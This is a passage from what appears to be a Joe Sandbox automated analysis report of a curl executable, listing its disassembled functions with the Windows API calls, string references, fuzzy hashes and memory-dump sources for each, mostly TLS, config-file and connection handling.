Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renegotiate, an error is pending$schannel: can't renegotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
API String ID: 0-3083360527
Opcode ID: f08b2ca548162424c757a590677ae2885934721231432b5bc7cf589d5f03f082
Instruction ID: 91c7854b90c32b394e56ebfdb12f5832f8460c8b73ed3b6182f649c517b95099
Opcode Fuzzy Hash: f08b2ca548162424c757a590677ae2885934721231432b5bc7cf589d5f03f082
Instruction Fuzzy Hash: 15F1A171608B029FDB28CF28D940A6BB7E6BF48310F14452EF4C997681D7B4E894CF96

Function 000CDC15 Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 418
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00117A20,?,00000000,00000000), ref: 000CDC5D
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,000CCE9B,?,000C901E,?), ref: 000CDC6C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000), ref: 000CDCBE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CDE1A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 000CDF7E

Strings

_curlrc, xrefs: 000CDC94
.curlrc, xrefs: 000CDC41
<stdin>, xrefs: 000CDFE8
%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 000CDEFC
%s:%d: warning: '%s' %s, xrefs: 000CE012

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: malloc$__acrt_iob_funcfopenfree
String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
API String ID: 2899880627-1529230327
Opcode ID: 36cb5f27d779e5b08c0755044a5e8bed8eb96b3641a86866b125db7ce6d9d853
Instruction ID: ceb3c1a100fdd68ef7bb3591cae9cc312f851fda3e60a51648441c1c41594b3a
Opcode Fuzzy Hash: 36cb5f27d779e5b08c0755044a5e8bed8eb96b3641a86866b125db7ce6d9d853
Instruction Fuzzy Hash: 1EE10170E002559FDB658FA8D494BFDBBF1AF59300F28407FE482AB292D6758D86CB50

Function 000C2230 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 155
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C22E2
_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C22E9
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C22F6
_isatty.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C22FD
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 000C2312
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,00000000), ref: 000C232A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2336
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,?), ref: 000C2354
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00000000,?,00000000), ref: 000C236C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2377
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2387
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 000C239E
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C23DC

Strings

Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 000C22BB

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ByteCharConsoleMultiWide_filenofree$BufferInfoScreenWrite_get_osfhandle_isattyfflushfwritemalloc
String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
API String ID: 4159644049-3734715646
Opcode ID: 888220ed9db1a2a28e656175bb30d682ede4772ece4998e7970f0de467158ad3
Instruction ID: bb62da4a4bca1ad7657546e6c5d150ec68a45b82a146ceefb34a6dec64399ce1
Opcode Fuzzy Hash: 888220ed9db1a2a28e656175bb30d682ede4772ece4998e7970f0de467158ad3
Instruction Fuzzy Hash: 77517C71A00606EFDB289FA4D948FEEBBF5BF18310F04402DF805A69A1D7749D80CB24

Function 000CA06F Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000CA079
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,If-None-Match: %s,00000000), ref: 000CA0CD
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000CA0F2
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CA117
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000CA123
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000CC59E

Strings

If-None-Match: %s, xrefs: 000CA0BD
Failed to open %s, xrefs: 000CA095
If-None-Match: "", xrefs: 000CA0DB
Failed to allocate memory for custom etag header, xrefs: 000CA0F9
k%, xrefs: 000CA038
Failed creating file for saving etags: "%s". Skip this transfer, xrefs: 000CA173

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fclose$free$fopen
String ID: Failed creating file for saving etags: "%s". Skip this transfer$Failed to allocate memory for custom etag header$Failed to open %s$If-None-Match: ""$If-None-Match: %s$k%
API String ID: 502121373-281841017
Opcode ID: df2f727d7d451b437b9146dffba0034e0605927c8f219ddc929c22a80a660874
Instruction ID: db849cd7b550c32027ecbeb203526d521a248ade8786e35e0f3c8fbf694e58f2
Opcode Fuzzy Hash: df2f727d7d451b437b9146dffba0034e0605927c8f219ddc929c22a80a660874
Instruction Fuzzy Hash: CF51C231A04708CFDF28DBA0DC45FED7BF1AF46344F28406EE805AA282EB759981CB11

Function 00104B3E Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104BCA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104BFE
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104C39
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104CD0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 00104DDA

Part of subcall function 000DDB77: recv.WS2_32(?,?,?,00000000), ref: 000DDB81
Part of subcall function 000DDB77: WSAGetLastError.WS2_32(?,?,?,00000000), ref: 000DDB8E

Strings

schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 0010501F
schannel: unable to allocate memory, xrefs: 00105122
schannel: %s, xrefs: 00104FC7
schannel: SNI or certificate check failed: %s, xrefs: 00104FE9
SSL: public key does not match pinned public key, xrefs: 001050BE
schannel: unable to re-allocate memory, xrefs: 00104C41
schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 00104F1B
schannel: next InitializeSecurityContext failed: %s, xrefs: 00104FA8, 00104FF8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: malloc$ErrorLastfreereallocrecv
String ID: SSL: public key does not match pinned public key$schannel: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
API String ID: 3337821324-3713536417
Opcode ID: d707bd1520a484b200e2fb384ad9460b346a1c717c26a43c7955e29e075eddc9
Instruction ID: 50da8501f45488b7a18594f1fb5bcae927b1a82881cada51b7fce64fd25a22c2
Opcode Fuzzy Hash: d707bd1520a484b200e2fb384ad9460b346a1c717c26a43c7955e29e075eddc9
Instruction Fuzzy Hash: A5F15DB0A006159FDB28DF18CD85BE9B7B5BF48310F1081EAE54DA7295DBB09E81CF91

Function 000EFD8C Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 343
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFDDF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFE73
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFE95
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFEA8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFF51
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFF76
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFF89
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F00F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F00FD
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000F01FB

Strings

%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 000EFE1B
** Resuming transfer from byte position %I64d, xrefs: 000EFE08
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 000F01E2

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$fflush
String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
API String ID: 1893817590-664487449
Opcode ID: f8240bb303d796f92dc6237ba57dbcc3982d0637ddee94010e7258eddd48bff8
Instruction ID: 90dbcde16bb3e611eb075a506c92923daf69d0c1e143f92d348fa4a24153e963
Opcode Fuzzy Hash: f8240bb303d796f92dc6237ba57dbcc3982d0637ddee94010e7258eddd48bff8
Instruction Fuzzy Hash: 19D14571E04749AEEB648B65CC81BEEB7B9FF48300F10416DEA5EA3252DB3539819F10

Function 000D760D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 252
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7728
send.WS2_32(?,00000000,00000000,00000000), ref: 000D77EA
WSAEventSelect.WS2_32(?,?,00000000), ref: 000D781C
WSAWaitForMultipleEvents.WS2_32(00000001,000000DC,00000000,000003E8,00000000,00000000,00000000,00000000), ref: 000D7879
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D78B1
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 000D78EE
WSAEventSelect.WS2_32(?,?,00000000), ref: 000D7900
WSAResetEvent.WS2_32(?), ref: 000D7925
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7948

Strings

2, xrefs: 000D77D7

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Event$EventsSelectfree$EnumMultipleNetworkResetWaitmallocsend
String ID: 2
API String ID: 760094153-450215437
Opcode ID: b59e69d2ac2b9ae45660e99ba1f85a8cc0ca99ac12e77f580130a7fa0b85f327
Instruction ID: de1945d691934cf1426da63a283d8eb44a81d3c2e1863ced45f1d8eb7198dc3d
Opcode Fuzzy Hash: b59e69d2ac2b9ae45660e99ba1f85a8cc0ca99ac12e77f580130a7fa0b85f327
Instruction Fuzzy Hash: E9A1C130A047299FDB648F64CC84BADB7B6EF45310F1082AAD55EA7391EB309D85CF61

Function 000DEE55 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000DE407: htons.WS2_32(?), ref: 000DE43C

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 000DEEDE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DEEE6

Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193

Part of subcall function 000DF3FC: closesocket.WS2_32(000E1EF4), ref: 000DF433

Strings

*, xrefs: 000DF03B
Immediate connect fail for %s: %s, xrefs: 000DF15C
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 000DEF00
Trying %s:%d..., xrefs: 000DEF23

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrclosesockethtonsstrncpy
String ID: Trying %s:%d...$*$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 1577232418-1840382996
Opcode ID: c32f0ab33a99ca6571cfff78e02c5172254ea0d98711811e611c274949a7d731
Instruction ID: 61ccd07e7aa304147f8fbb516dc50003ce0323e982e8270aab79aee35c3c9082
Opcode Fuzzy Hash: c32f0ab33a99ca6571cfff78e02c5172254ea0d98711811e611c274949a7d731
Instruction Fuzzy Hash: 50919231A003599BDF65AB24DC44BED77B6AF49314F1440FBE80AA7392DB319E848F60

Function 000E54C5 Relevance: 15.5, APIs: 2, Strings: 8, Instructions: 538COMMON

Download Yara Rule

Strings

No connections available., xrefs: 000E5B5B
host, xrefs: 000E5AA1
No connections available in cache, xrefs: 000E5C70
NTLM-proxy picked AND auth done set, clear picked, xrefs: 000E5C0F
proxy, xrefs: 000E5AA7, 000E5AAF
Re-using existing connection #%ld with %s %s, xrefs: 000E5AB3
No more connections allowed to host: %zu, xrefs: 000E5B4D
NTLM picked AND auth done set, clear picked, xrefs: 000E5BE3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: calloc$free
String ID: NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection #%ld with %s %s$host$proxy
API String ID: 171065143-538710404
Opcode ID: 369d0a72a70ded07a5b4419d07ad2bb8f7986c48ea071c1c8bc1367bfd18693f
Instruction ID: de423435dd57b4aca8f5bf2d00c8a145bf64dbac28a2622ecef7851623c640ff
Opcode Fuzzy Hash: 369d0a72a70ded07a5b4419d07ad2bb8f7986c48ea071c1c8bc1367bfd18693f
Instruction Fuzzy Hash: 8022B770B04E819FDB59DF39C8947E9B7E1BF48315F08466AE818AB342DB70AC15CB91

Function 000DE820 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 384COMMON

Download Yara Rule

Strings

After %I64dms connect time, move on!, xrefs: 000DE98C
connect to %s port %u failed: %s, xrefs: 000DEAB2
L', xrefs: 000DE99A
Failed to connect to %s port %u after %I64d ms: %s, xrefs: 000DED2B
Connection timeout after %ld ms, xrefs: 000DEC51

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$L'$connect to %s port %u failed: %s
API String ID: 0-861291074
Opcode ID: ebbd31ebaf8341fb1a88fba3e6d2b140b51e5c0cea63a1285aa6372cf2a41f36
Instruction ID: 90bc6ae3cb87f1d7f6515b757354a3d6d508fb66f7e2868927268e68f77f76bb
Opcode Fuzzy Hash: ebbd31ebaf8341fb1a88fba3e6d2b140b51e5c0cea63a1285aa6372cf2a41f36
Instruction Fuzzy Hash: FBE1D5319007949BDF65EE28CC457EA73B6AF85324F1401EAEC096F392DB719D818FA1

Function 000E8A20 Relevance: 12.1, APIs: 8, Instructions: 80networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000FFEA6: getaddrinfo.WS2_32(?,?,?,?), ref: 000FFEC0
Part of subcall function 000FFEA6: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000FFF44

WSAGetLastError.WS2_32 ref: 000E8A68
WSAGetLastError.WS2_32 ref: 000E8A72
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 000E8A87
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 000E8A95
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8AB1
send.WS2_32(000000FF,?,00000001,00000000), ref: 000E8ACC
WSAGetLastError.WS2_32 ref: 000E8AD6
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 000E8AE4

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CriticalErrorLastSection$Leave$Enterfreegetaddrinfomallocsend
String ID:
API String ID: 2368937457-0
Opcode ID: b74b68ed492899e78cd215727890411493fc483de6a92d183778b2a87f485084
Instruction ID: 9e713d823357ffc56a5e6e55fae426effacc83fe30f59451dd40631f3a85e702
Opcode Fuzzy Hash: b74b68ed492899e78cd215727890411493fc483de6a92d183778b2a87f485084
Instruction Fuzzy Hash: CF219E75600704DFD7249FA5DD44AABBBF9FF88700B04893EE856D36A1DA31A845CBA0

Function 00104579 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 187libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 0010463C
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00104643

Strings

wine_get_version, xrefs: 00104632
Failed to set SNI, xrefs: 001047E5
ntdll, xrefs: 00104637
schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 0010461C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Failed to set SNI$ntdll$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$wine_get_version
API String ID: 1646373207-3067498429
Opcode ID: 46a3f17fd38102b81009c17a02f391e649ba578ec9109ec1a69ae979af599344
Instruction ID: fb299650896f196aadd0af2685ad8e105c11a57217c7c16c2780a4008aac6cfb
Opcode Fuzzy Hash: 46a3f17fd38102b81009c17a02f391e649ba578ec9109ec1a69ae979af599344
Instruction Fuzzy Hash: 206192B0A04340DFDB398F249C85BF573B5AF86325F1402B9E9959E2D2E7B18D85CB11

Function 000CCBAE Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 000D2677: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E7EE5,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?,?), ref: 000D26C4
Part of subcall function 000D2677: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8849,00000000,?,?,?,000D2373,?,?,?,?,000C16C6,?,00200030), ref: 000D26DF

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000CCC1D

Part of subcall function 000D2920: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C9117,?,?,?,00000000,Failed to create/open output), ref: 000D2935

Part of subcall function 000D2677: GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?), ref: 000D2698

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000CCC5D

Strings

out of memory, xrefs: 000CCC36, 000CCC76
SSL_CERT_FILE, xrefs: 000CCC93
CURL_CA_BUNDLE, xrefs: 000CCC0C
SSL_CERT_DIR, xrefs: 000CCC4C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupfree$EnvironmentVariablerealloc
String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$out of memory
API String ID: 8184070-1311070097
Opcode ID: 0903d08e73c382cc61124d390ae1cb62667a61f50b38a4e9cdf000c07c237cb4
Instruction ID: 29ea0bb1db05bbe0325f766ee2a2030ddb8a1410abb47110e5d7681194f4ae4b
Opcode Fuzzy Hash: 0903d08e73c382cc61124d390ae1cb62667a61f50b38a4e9cdf000c07c237cb4
Instruction Fuzzy Hash: B931DB71A04352AFDB16ABB4D8A1FEDB7E0AF15310F15016EE84CA7352EB748E40C791

Function 000CCE40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000CCE46
